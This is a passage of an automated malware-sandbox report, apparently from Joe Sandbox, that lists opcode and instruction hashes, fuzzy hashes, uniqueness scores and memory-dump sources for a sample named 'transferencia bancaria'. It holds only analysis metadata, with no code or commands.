                                        • Instruction Fuzzy Hash: 9E117675904280DFCB52CF10D5C4B15BBA1FB88224F28C6AAD8494B656C33AD85BCBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277369160.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_306d000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec61335b488afc360c978185d5152d3224cbc0af43cce3f1df3eff1f0f4474bd
                                        • Instruction ID: 05db5937823ea924a6b893e085f0076e378b98333675bb1169eaf373a82a58db
                                        • Opcode Fuzzy Hash: ec61335b488afc360c978185d5152d3224cbc0af43cce3f1df3eff1f0f4474bd
                                        • Instruction Fuzzy Hash: 2801F7716093809AE710CE26CCC4B6BFBD8EF45274F0C855AE9045B24AE3799840CAB3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277369160.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_306d000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eae4b98c44b7d4a1ab09533dd3ed1251d8197860a182be7c155eee703c2e859
                                        • Instruction ID: c5492be605fc989df4426dbc8cfbc6d03f93553039a10e6868ea8fe046f6732c
                                        • Opcode Fuzzy Hash: 5eae4b98c44b7d4a1ab09533dd3ed1251d8197860a182be7c155eee703c2e859
                                        • Instruction Fuzzy Hash: 54F0C2715093849AEB508E16CCC8B67FBE8EB41234F1CC45AED081B28AD3789844CAB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cfa17c49f5bef14552192e199ccbcdc3338d3e677adc85f9d5596713a9f0dc6
                                        • Instruction ID: 0a0d70e19c487e402900f47e36d3a175ac91b54f0b1dbe8202f9d11404c4338e
                                        • Opcode Fuzzy Hash: 5cfa17c49f5bef14552192e199ccbcdc3338d3e677adc85f9d5596713a9f0dc6
                                        • Instruction Fuzzy Hash: 0312FBF14217468BD318EF57E8886897F63B74A328F906308D1611BAD9D7B4B1CACF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36049b43dcdf85cd24b4351ebeee96a61c6b51ed8b72818776a21e0f1865e075
                                        • Instruction ID: d0a79fdf8e789f8ba10306136b0c3993351b466c5c278666db25db8d1af63f4f
                                        • Opcode Fuzzy Hash: 36049b43dcdf85cd24b4351ebeee96a61c6b51ed8b72818776a21e0f1865e075
                                        • Instruction Fuzzy Hash: 82A15E3AE00619CFCF05DFA9C8845DDBBB2FF89301B15856AE905BB261DB31A945CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbc1bc7324844476e46b5797c8798c3a7c4e9f1b306ea7592fef67dd43eabd64
                                        • Instruction ID: a6c13f4e8d442c062513442e60d0f6ca99dc7c8007fb1843bcb1125453201fed
                                        • Opcode Fuzzy Hash: cbc1bc7324844476e46b5797c8798c3a7c4e9f1b306ea7592fef67dd43eabd64
                                        • Instruction Fuzzy Hash: A3C13BB14217458BD718EF67E8885897F73BB9A328F505308D1612BAD8D7B470CACFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%